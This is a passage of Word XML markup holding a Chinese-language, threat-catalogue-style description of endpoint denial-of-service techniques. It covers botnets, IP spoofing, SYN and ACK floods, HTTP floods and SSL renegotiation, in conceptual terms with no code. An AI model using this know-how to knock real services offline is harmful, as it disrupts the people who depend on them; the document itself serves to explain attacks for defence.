        <w:t>攻击可能发生于单个</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>系统或</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分布在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Internet</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上的多个系统，通常称为分布式</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354FF7B4" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>采用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多种</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>方法来</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>针对端点资源执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击，包括</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址伪造和僵尸网络。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DE8623" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用攻击系统的原始</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址或伪造源</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址来使得防御程序很难从攻击流量追溯到攻击系统或启用反射。这会降低或消除网络防御设备上源地址过滤的有效性，从而增加防御程序防御攻击的难度。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECCCD13" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>僵尸网络通常用于对网络和服务进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击。大型僵尸网络可以从遍布全球互联网的系统中产生大量流量。攻击者可能拥有足够</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>资源来</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构建和控制自己的僵尸网络基础设施，也可以租用已有</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>僵尸网络来实施攻击。在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的一些最坏情况下，许多系统被用来生成请求，每个系统只需要发送少量数据就可以产生足够的数据量来耗尽目标的资源。这种情况下，区分</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流量和合法客户端变得非常困难。僵尸网络已经被用于一些</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>引人瞩目的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击行动，例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2012</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年针对美国主要银行的一系列攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E41C01" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在流量操纵情况下，全局网络（例如高流量网关路由器）中可能存在可以更改数据包并导致合法客户端执行代码以将大量网络数据包定向到目标的点。这种类型的功能以前用于</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>审查，其中客户端</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流量被修改为包含</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的引用。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>该</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码以攻击目标</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071344DC" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关于试图使提供服务的网络饱和的攻击，请参考“网络拒绝服务”。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09454E05" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>系统耗尽泛洪</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CEBBBB" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于操作系统（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）负责管理系统上的有限资源，它们可能会成为</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的目标。这种攻击不需要耗尽系统上的实际资源，因为它们只需耗尽操作系统自我施加的限制。操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>系统自我施加限制是为了防止</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>整个系统因容量不满足</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>要求</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而变得不堪重负。存在多种实现此目的的方法，包括</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态耗尽攻击，例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泛洪和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ACK</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泛洪。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1004CB54" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>SYN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泛洪</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F9198D" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泛洪攻击会发送过多的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据包，但</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三向握手永远不会完成。因为每个操作系统都有最大并发</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接数限制，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>YN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泛洪</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>攻击会很快耗尽</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统接收</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接新请求的能力，从而阻止访问服务器提供的任何</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49560D5D" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>ACK</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泛洪</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054B8C25" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ACK</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泛洪攻击利用了</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议的状态性质，发送大量</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ACK</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据包到目标，迫使操作系统在其状态表中搜索是否已</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>建立相关</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接。如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ACK</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据包用于不存在的连接，操作系统必须搜索整个状态表来确认不存在匹配项。当有</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>数量巨大的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ACK</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据包必需</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>处理时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>系</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:lastRenderedPageBreak/>
        <w:t>统需要检查数据包状态</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来判断</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>它们是否合法</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从而剔除</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>恶意数据包，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>也会不堪重负导致</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应缓慢</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>或无响应。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>过程</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>占用了</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>大量用于提供</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目标</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>服务的资源。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4C155F" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>耗尽泛洪</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DCC49E" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>针对</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统提供的不同网络服务以不同的方式来</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>实施</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击。他们通常以</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器为攻击目标，但也可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>以其他服务为目标</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。他们可</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>用多种方法攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器软件，其中某些方法适用范围</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>较广</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而另外一些方法只</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>适用于</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供服务的软件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6F927A" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简单</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泛洪</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42532B2F" w14:textId="75120AEC" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以向</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器发出大量</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求，以使其和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或在其之上运行的应用不堪重负。这种泛洪</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>依赖于</w:t>
      </w:r>
      <w:r w:rsidR="00E80078">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原始请求</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来实现目标，耗尽了攻击对象软件提供服务所需的各种资源。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAC9440" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新协商攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C01D7C" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新协商攻击利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL/TLS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议功能。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL/TLS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
